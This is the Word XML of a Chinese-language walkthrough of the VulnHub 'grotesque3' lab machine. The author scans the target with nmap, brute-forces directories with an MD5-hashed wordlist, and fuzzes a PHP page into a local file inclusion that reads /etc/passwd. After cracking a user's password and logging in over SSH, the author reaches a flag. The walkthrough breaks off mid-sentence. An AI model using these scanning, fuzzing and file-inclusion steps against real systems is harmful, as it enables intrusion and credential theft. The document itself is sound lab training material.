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2AD2D" w14:textId="51E0C821" w:rsidR="00857411" w:rsidRDefault="00E1408C">
      <w:r w:rsidRPr="00E1408C">
        <w:t>grotesque3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0711E9E8" w14:textId="2D9EB6BE" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="009B45A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/grotesque-301,723/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1625863D" w14:textId="77777777" w:rsidR="00E1408C" w:rsidRDefault="00E1408C"/>
    <w:p w14:paraId="25B060A2" w14:textId="77777777" w:rsidR="00E1408C" w:rsidRDefault="00E1408C"/>
    <w:p w14:paraId="6801A082" w14:textId="091BAD41" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F294942" w14:textId="5018E7A3" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t>-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F057738" w14:textId="2DD238B4" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:r w:rsidRPr="00E1408C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74D61D24" wp14:editId="39E10147">
            <wp:extent cx="5274310" cy="1259205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="141041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11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C2B5" w14:textId="09BEA766" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.21.144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1EE3C4" w14:textId="6C2D8ED0" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09440FC8" w14:textId="0F6EBF9E" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t xml:space="preserve"> --min-rate 10000 -p- 192.168.21.144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B5C1DD" w14:textId="1E591D05" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:r w:rsidRPr="00E1408C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BBB0E46" wp14:editId="2D285D7D">
            <wp:extent cx="5274310" cy="1954530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="138746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C0A4" w14:textId="56D47F56" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17489DD4" w14:textId="07F35105" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t xml:space="preserve"> -O -p22,80 192.168.21.144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC21BFB" w14:textId="21101D49" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:r w:rsidRPr="00E1408C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024036E4" wp14:editId="3E9528E3">
            <wp:extent cx="5274310" cy="2174240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="592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9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DFCA" w14:textId="450F0BEC" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F183C0C" w14:textId="57EA5EBE" w:rsidR="00E1408C" w:rsidRDefault="00E1408C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E1408C">
        <w:t xml:space="preserve"> --script=vuln -p22,80 192.168.21.144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7B744D" w14:textId="4CA8B82D" w:rsidR="00E1408C" w:rsidRDefault="00BD39D8">
      <w:r w:rsidRPr="00BD39D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FAE713B" wp14:editId="07ACFD0E">
            <wp:extent cx="5274310" cy="2386965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="204492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22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9617" w14:textId="7DF82F3E" w:rsidR="00BD39D8" w:rsidRDefault="00BD39D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先看看web网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732F8CF0" w14:textId="1DDA6FA0" w:rsidR="00BD39D8" w:rsidRDefault="00BD39D8">
      <w:r w:rsidRPr="00BD39D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FF903F9" wp14:editId="24675DC6">
            <wp:extent cx="5274310" cy="3575685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1103708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8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EA5" w14:textId="61A74678" w:rsidR="00BD39D8" w:rsidRDefault="00BD39D8">
      <w:r w:rsidRPr="00BD39D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="694754D0" wp14:editId="4ECA12CC">
            <wp:extent cx="5274310" cy="1946275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1166021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21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21F" w14:textId="2B5563F7" w:rsidR="00BD39D8" w:rsidRDefault="00BD39D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大概率这里面有隐写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C52E333" w14:textId="7AFFB996" w:rsidR="00BD39D8" w:rsidRDefault="00BD39D8">
      <w:r w:rsidRPr="00BD39D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F7F9D56" wp14:editId="052DE019">
            <wp:extent cx="5274310" cy="485140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="103376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608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F71" w14:textId="751178C8" w:rsidR="00BD39D8" w:rsidRDefault="00BD39D8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD39D8">
        <w:t>binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD39D8">
        <w:t xml:space="preserve"> atlasg.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BCDA7D" w14:textId="55F52C35" w:rsidR="00BD39D8" w:rsidRDefault="00BD39D8">
      <w:r w:rsidRPr="00BD39D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39ADD1A9" wp14:editId="77E52051">
            <wp:extent cx="5274310" cy="839470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1269174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4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847" w14:textId="57F72984" w:rsidR="00BD39D8" w:rsidRDefault="00BD39D8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD39D8">
        <w:t>binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD39D8">
        <w:t xml:space="preserve"> -e atlasg.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2ED7B4" w14:textId="3AAD0141" w:rsidR="00BD39D8" w:rsidRDefault="00BD39D8" w:rsidP="00BD39D8">
      <w:r w:rsidRPr="00BD39D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A15DE6D" wp14:editId="4D6436EA">
            <wp:extent cx="5274310" cy="2853690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="53075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54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7A2A" w14:textId="52053360" w:rsidR="00BD39D8" w:rsidRDefault="00B75762" w:rsidP="00BD39D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里愣是没有找到任何东西，没有任何办法，没办法我去网上看了别人的流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6041C1" w14:textId="62623C85" w:rsidR="00B75762" w:rsidRDefault="00B75762" w:rsidP="00BD39D8">
      <w:r w:rsidRPr="00B75762">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB8A84F" wp14:editId="35EA13A8">
            <wp:extent cx="5274310" cy="3080385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="9115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67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94D9" w14:textId="46E17C0F" w:rsidR="00B75762" w:rsidRDefault="00B75762" w:rsidP="00BD39D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到这真的离谱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38649553" w14:textId="018374E7" w:rsidR="00B75762" w:rsidRDefault="00B75762" w:rsidP="00BD39D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里是要生成md</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录去爆破网站的目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467F08AE" w14:textId="3A60D9F0" w:rsidR="00B75762" w:rsidRDefault="00B75762" w:rsidP="00BD39D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>生成MD5列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E7708D" w14:textId="65593CA5" w:rsidR="00B75762" w:rsidRDefault="00B75762" w:rsidP="00BD39D8">
      <w:r w:rsidRPr="00B75762">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B75762">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B75762">
        <w:t xml:space="preserve"> in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt); do echo $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B75762">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B75762">
        <w:t xml:space="preserve"> | md5sum &gt;&gt; dirmd5.txt; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65716728" w14:textId="4A8F4BB0" w:rsidR="00BC2EAB" w:rsidRDefault="00BC2EAB" w:rsidP="00BD39D8">
      <w:r w:rsidRPr="00BC2EAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="765776D3" wp14:editId="14767F55">
            <wp:extent cx="3299746" cy="716342"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="2032261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618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75CA" w14:textId="6DAD67D5" w:rsidR="00B75762" w:rsidRDefault="009D2E3C" w:rsidP="00BD39D8">
      <w:r w:rsidRPr="009D2E3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30753B9C" wp14:editId="1C7C926F">
            <wp:extent cx="4945809" cy="6302286"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="1234255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55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F568" w14:textId="33ED6AB2" w:rsidR="009D2E3C" w:rsidRDefault="009D2E3C" w:rsidP="00BD39D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去掉最后的‘-’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783B17D8" w14:textId="60EE968A" w:rsidR="009D2E3C" w:rsidRDefault="009D2E3C" w:rsidP="00BD39D8">
      <w:r w:rsidRPr="009D2E3C">
        <w:t>cat dirmd5.txt|sed 's</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D2E3C">
        <w:t>/  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D2E3C">
        <w:t>//g' &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009D2E3C">
        <w:t xml:space="preserve"> dirmd5.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2AC3C3" w14:textId="3E9B88B4" w:rsidR="009D2E3C" w:rsidRDefault="009D2E3C" w:rsidP="00BD39D8">
      <w:r w:rsidRPr="009D2E3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FD837B5" wp14:editId="54DDFE2F">
            <wp:extent cx="4861981" cy="6149873"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="93605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57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317B" w14:textId="751E88E2" w:rsidR="00BC2EAB" w:rsidRDefault="009D2E3C" w:rsidP="00BD39D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页目录爆破</w:t>
      </w:r>
      <w:r w:rsidR="007530CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（多等一下有点慢）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736C68AF" w14:textId="1AED7DDF" w:rsidR="009D2E3C" w:rsidRDefault="009D2E3C" w:rsidP="00BD39D8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D2E3C">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D2E3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D2E3C">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D2E3C">
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D2E3C">
        <w:t>u http://192.168.21.144 -w dirmd5.txt -x html.php.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A18AB83" w14:textId="1742A9E1" w:rsidR="00C6304A" w:rsidRDefault="00F73B8D" w:rsidP="00BD39D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>太多了不相等了就直接借用别人的图片了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6491A5DE" w14:textId="77777777" w:rsidR="00087142" w:rsidRDefault="00087142" w:rsidP="00BD39D8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510E3C87" w14:textId="73C19583" w:rsidR="00C6304A" w:rsidRDefault="00A34419" w:rsidP="00BD39D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30BBACAB" wp14:editId="68A742FB">
            <wp:extent cx="5274310" cy="2509157"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1523428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5"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="250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A4941" w14:textId="2F9AA8B7" w:rsidR="007530CF" w:rsidRDefault="00000000" w:rsidP="00BD39D8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00C6304A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>192.168.21.144/f66b22bf020334b04c7d0d3eb5010391.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30866632" w14:textId="13A623CE" w:rsidR="00A34419" w:rsidRDefault="00A34419" w:rsidP="00BD39D8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A34419">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B83F58" wp14:editId="53B774EF">
            <wp:extent cx="5274310" cy="3209290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="66925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51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9C47" w14:textId="44414C78" w:rsidR="00A34419" w:rsidRDefault="00A34419" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A34419">
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A34419">
        <w:t xml:space="preserve"> -c -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A34419">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A34419">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A34419">
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A34419">
        <w:t xml:space="preserve">/big.txt -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00882B58">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.21.144/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=/etc/passwd --hw 0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D2B5C83" w14:textId="2A03B102" w:rsidR="00A34419" w:rsidRDefault="00A34419" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A34419">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AAA6B9F" wp14:editId="5E02D1F6">
            <wp:extent cx="5274310" cy="2002790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="858078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78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792D" w14:textId="77777777" w:rsidR="00A34419" w:rsidRDefault="00A34419" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5C043A" w14:textId="60A42760" w:rsidR="00A34419" w:rsidRDefault="00000000" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="00A34419">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>192.168.21.144/f66b22bf020334b04c7d0d3eb5010391.php?purpose=/etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="341B9109" w14:textId="349F72C8" w:rsidR="00A34419" w:rsidRDefault="00A34419" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A34419">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64032EB5" wp14:editId="0814FF7D">
            <wp:extent cx="5274310" cy="1050290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1254590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905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9746" w14:textId="50C7344B" w:rsidR="00087142" w:rsidRDefault="00746022" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>倒着看发现有个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>freddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个用户感觉有点问题，这里只能用md</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行爆破（这里也是借的图，太长真的没必要这个就是没思路的下下下策）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2DA1BC" w14:textId="33BB1D30" w:rsidR="00746022" w:rsidRDefault="00746022" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34F669FE" wp14:editId="6F629355">
            <wp:extent cx="5274310" cy="2351314"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2140049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5"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310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6E1FC" w14:textId="35A46E80" w:rsidR="00746022" w:rsidRDefault="00746022" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D81F2AA" w14:textId="67234912" w:rsidR="00087142" w:rsidRDefault="00087142" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087142">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FB73531" wp14:editId="31B9A845">
            <wp:extent cx="5274310" cy="2322195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="2075239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3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ED0F" w14:textId="06E8E655" w:rsidR="00746022" w:rsidRDefault="00087142" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33635211" w14:textId="4B8C4AA6" w:rsidR="00087142" w:rsidRDefault="00087142" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00087142">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60188FA1" wp14:editId="37722D49">
            <wp:extent cx="5274310" cy="458470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="171832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205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E10" w14:textId="207464D2" w:rsidR="00087142" w:rsidRDefault="002258BD" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002258BD">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C4C83D0" wp14:editId="0E698CE5">
            <wp:extent cx="4732430" cy="2263336"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="108945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57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C561" w14:textId="54BE2FBF" w:rsidR="002258BD" w:rsidRDefault="002258BD" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002258BD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F3AA82D" wp14:editId="28528E81">
            <wp:extent cx="3017782" cy="396274"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1784572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728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245D" w14:textId="378902C0" w:rsidR="002258BD" w:rsidRDefault="002258BD" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65700CF5" w14:textId="7436D0E1" w:rsidR="002258BD" w:rsidRDefault="002258BD" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002258BD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F82F70" wp14:editId="4D40C483">
            <wp:extent cx="5227773" cy="426757"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="126108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849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58DF" w14:textId="40259A81" w:rsidR="002258BD" w:rsidRDefault="002258BD" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没办法了，先看一下端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450C523B" w14:textId="51851D70" w:rsidR="002258BD" w:rsidRDefault="002258BD" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002258BD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AC73F3B" wp14:editId="1955D4DA">
            <wp:extent cx="5274310" cy="1597660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="124439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931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184B" w14:textId="2D301832" w:rsidR="002258BD" w:rsidRDefault="002258BD" w:rsidP="00A34419">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>警觉这里开启4</w:t>
